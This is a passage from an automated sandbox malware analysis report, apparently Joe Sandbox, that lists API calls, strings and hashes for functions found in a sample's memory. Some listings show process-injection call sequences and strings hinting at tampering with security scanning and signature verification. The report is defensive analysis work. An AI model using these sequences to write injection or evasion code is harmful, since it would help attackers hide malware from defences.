                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                        • Instruction ID: fa62294ca95daa0ce887f5b9f16be9fcf88b110a87ee3e591fa93e3b9f1875ab
                        • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                        • Instruction Fuzzy Hash: 90C08CEC31220A0B1A54A1FC1CC412A428809051393A42F21E23CDA2E2EF21C8232421
                        Function 02844C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        • SysReAllocStringLen.OLEAUT32(0286C2B4,0285ED84,000000B4), ref: 02844C62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                        • Instruction ID: 992a72e41bdb70e8ec8df5579188c3a9ebb617a035e10c67d96d9b86f93f34e2
                        • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                        • Instruction Fuzzy Hash: 0DD012BC50410D5FBA2C99D94544B36626A99D030A74CC659980ACA241FF319540CA31
                        Function 0286BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        APIs
                        • timeSetEvent.WINMM(00002710,00000000,0286BF78,00000000,00000001), ref: 0286BF94
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Eventtime
                        • String ID:
                        • API String ID: 2982266575-0
                        • Opcode ID: 22ff24b22d08d2e8fc0eb83f5ef63db918273aceb48ce2c93082b58948fe3e09
                        • Instruction ID: 13b082c0cf8734e72fa4723ceb32459721d90ea37e3e3bd2dd17b83bcf2defc7
                        • Opcode Fuzzy Hash: 22ff24b22d08d2e8fc0eb83f5ef63db918273aceb48ce2c93082b58948fe3e09
                        • Instruction Fuzzy Hash: 16C048E87893407EFA1097AE2CC2F37118DD704B15F600462BB00EA2D1D5E259504A20
                        Function 028415CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02841A03), ref: 028415E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 79cd1e680c05e8f9d8f57dec7486c5f93c8c040e4b9da2c56e803f683b3dfb03
                        • Instruction ID: c2568638c47f29a24e3414af2f8e90da44653d31cd9c4b7862a76aa0460c97d9
                        • Opcode Fuzzy Hash: 79cd1e680c05e8f9d8f57dec7486c5f93c8c040e4b9da2c56e803f683b3dfb03
                        • Instruction Fuzzy Hash: A8F06DF8B413406FDB09CF7999843417BD2EB89344F188579E70ADB7C8EB7284118B00
                        Function 02841682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028416A4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3af4aaade2d757745f4fcc3c577d2a12301a4c0dd26fcb28c101e8940dac7f96
                        • Instruction ID: 04f163276812d0acc7d306348cb905fd3a8c1bf56a0f5ec8ca8b21134d118e20
                        • Opcode Fuzzy Hash: 3af4aaade2d757745f4fcc3c577d2a12301a4c0dd26fcb28c101e8940dac7f96
                        • Instruction Fuzzy Hash: B1F090BEB446996BE7109E5A9C88792BBA4FB00355F054139EA0CD7384DB70A850CB94
                        Function 028416E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02841FE4), ref: 02841704
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: da8d427602b5fa85a47669f57f4d8db9e56fff91cc3d5b4f38d1a549179dfde8
                        • Instruction ID: 3592e79acd99295c0d508f553e265953b71954f94249768bfab69a2f27d0a2af
                        • Opcode Fuzzy Hash: da8d427602b5fa85a47669f57f4d8db9e56fff91cc3d5b4f38d1a549179dfde8
                        • Instruction Fuzzy Hash: B4E0867D3003156FE7105A7D5D88B12ABD8EB54654F144475F509DB286DB60E8508B64

                        Non-executed Functions

                        Function 0285A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0285ABDB,?,?,0285AC6D,00000000,0285AD49), ref: 0285A968
                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0285A980
                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0285A992
                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0285A9A4
                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0285A9B6
                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0285A9C8
                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0285A9DA
                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0285A9EC
                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0285A9FE
                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0285AA10
                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0285AA22
                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0285AA34
                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0285AA46
                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0285AA58
                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0285AA6A
                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0285AA7C
                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0285AA8E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                        • API String ID: 667068680-597814768
                        • Opcode ID: 482d416c3237a87c6414525343a4233e70031cbd279c450787ea530b272e9166
                        • Instruction ID: 513f6c24ce61d22e4230254f0d2f9c16ec9a18b05a4118359e853800e448c4d4
                        • Opcode Fuzzy Hash: 482d416c3237a87c6414525343a4233e70031cbd279c450787ea530b272e9166
                        • Instruction Fuzzy Hash: C43152BC9807349FFB55EFB8D9E5A163799BB067017000A65BC01CF249EB7894508F97
                        Function 02858BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        • GetThreadContext.KERNEL32(00000000,028A2420,ScanString,028A23A4,0285A774,UacInitialize,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,UacInitialize,028A23A4), ref: 0285943A
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • SetThreadContext.KERNEL32(00000000,028A2420,ScanBuffer,028A23A4,0285A774,ScanString,028A23A4,0285A774,Initialize,028A23A4,0285A774,00000000,-00000008,028A24F8,00000004,028A24FC), ref: 0285A14F
                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028A2420,ScanBuffer,028A23A4,0285A774,ScanString,028A23A4,0285A774,Initialize,028A23A4,0285A774,00000000,-00000008,028A24F8), ref: 0285A15C
                          • Part of subcall function 02858798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                          • Part of subcall function 02858798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                          • Part of subcall function 02858798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                        • API String ID: 4175202198-51457883
                        • Opcode ID: 47abb629c399ddc029620df33f86f05bca689230ca742ccd587474b52b3fe39b
                        • Instruction ID: 48979696d76869d9dc6a67ae0ad20b577eb0b20d5bd79e52c186ed12a134e9a4
                        • Opcode Fuzzy Hash: 47abb629c399ddc029620df33f86f05bca689230ca742ccd587474b52b3fe39b
                        • Instruction Fuzzy Hash: 9AE22E3CA1112C9FEB15EB68CCD1FDE73BAAF45300F1082A1A945EB215DE749E468F52
                        Function 02858BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        • GetThreadContext.KERNEL32(00000000,028A2420,ScanString,028A23A4,0285A774,UacInitialize,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,UacInitialize,028A23A4), ref: 0285943A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                        • API String ID: 1116111917-51457883
                        • Opcode ID: ad5bb4936860bcbd56df5171dd08ad8b959b633e7c77d17b8ee7c3e67f88f964
                        • Instruction ID: 5e9ebc32c9e910456f4dbc7c5b991202afd6cdd650560ac2fe1d4381b59d5067
                        • Opcode Fuzzy Hash: ad5bb4936860bcbd56df5171dd08ad8b959b633e7c77d17b8ee7c3e67f88f964
                        • Instruction Fuzzy Hash: D1E22E3CA1112C9FEB15EB68CCD1FDE73BAAF45300F1082A1A945EB215DE749E468F52
                        Function 028458B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,02846BC8,02840000,0286E790), ref: 028458D1
                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028458E8
                        • lstrcpynA.KERNEL32(?,?,?), ref: 02845918
                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 0284597C
                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459B2
                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459C5
                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459D7
                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459E3
                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000), ref: 02845A17
                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8), ref: 02845A23
                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02845A45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                        • String ID: GetLongPathNameA$\$kernel32.dll
                        • API String ID: 3245196872-1565342463
                        • Opcode ID: 1c5ecbf1fd2c483d0a25cf5b33df92d78ce7de87553a334b5a3434fde6a4a3c0
                        • Instruction ID: 84369f2dc520cb1d6e50e0af55d2af6ea3c4539ece5355ea1d537d4f89af2861
                        • Opcode Fuzzy Hash: 1c5ecbf1fd2c483d0a25cf5b33df92d78ce7de87553a334b5a3434fde6a4a3c0
                        • Instruction Fuzzy Hash: 7C41617DD0026DAFDB10DBE8CC88ADEB7BDAF19304F4445A6A548D7241DB349B448F50
                        Function 02845B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02845B94
                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02845BA1
                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02845BA7
                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02845BD2
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C19
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C29
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C51
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C61
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02845C87
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02845C97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                        • API String ID: 1599918012-2375825460
                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                        • Instruction ID: 8a77f6bf04a90b0a9ed97602e4db2111f96c139e7db83543e8d471f674632acd
                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                        • Instruction Fuzzy Hash: DE31757DE4022C6BFB25D6B89C49BDFB7AD5B14384F4401E19608E6181EF789B848F51
                        Function 02858798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                        • String ID: BCryptVerifySignature$bcrypt
                        • API String ID: 1002360270-4067648912
                        • Opcode ID: 8f479bed7243015e89b2aaec8d6f4d1447b362fa294f8bf4e39e6b5aad0b94e0
                        • Instruction ID: 99c6a9b1b4b740ea2bef5e41a64c43775984533cf46bea9fb23bc3de2996e32f
                        • Opcode Fuzzy Hash: 8f479bed7243015e89b2aaec8d6f4d1447b362fa294f8bf4e39e6b5aad0b94e0
                        • Instruction Fuzzy Hash: C3F0A47DA80628AFF330AAA9A854B16379CB783314F08092ABD08C71A4DFB408508B50
                        Function 0285DF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DFD2), ref: 0285DF3F
                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0285DF79
                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0285DFA6
                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0285DFAF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                        • String ID:
                        • API String ID: 3764614163-0
                        • Opcode ID: ae1bbe2fa7bd51a4299bd9e6d3c05de25e8a4dc55826a88f14777f475fb7e0ef
                        • Instruction ID: aa36f6e6a97c854d0cb4031eeb662466fdbb0693f36f9afbaa44f9fea8b6b260
                        • Opcode Fuzzy Hash: ae1bbe2fa7bd51a4299bd9e6d3c05de25e8a4dc55826a88f14777f475fb7e0ef
                        • Instruction Fuzzy Hash: 4A21C179A4031DBBEB11EAE4CC46F9EB7BDDB04B04F504561BA00F75D0DBB46E048A56
                        Function 0285DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
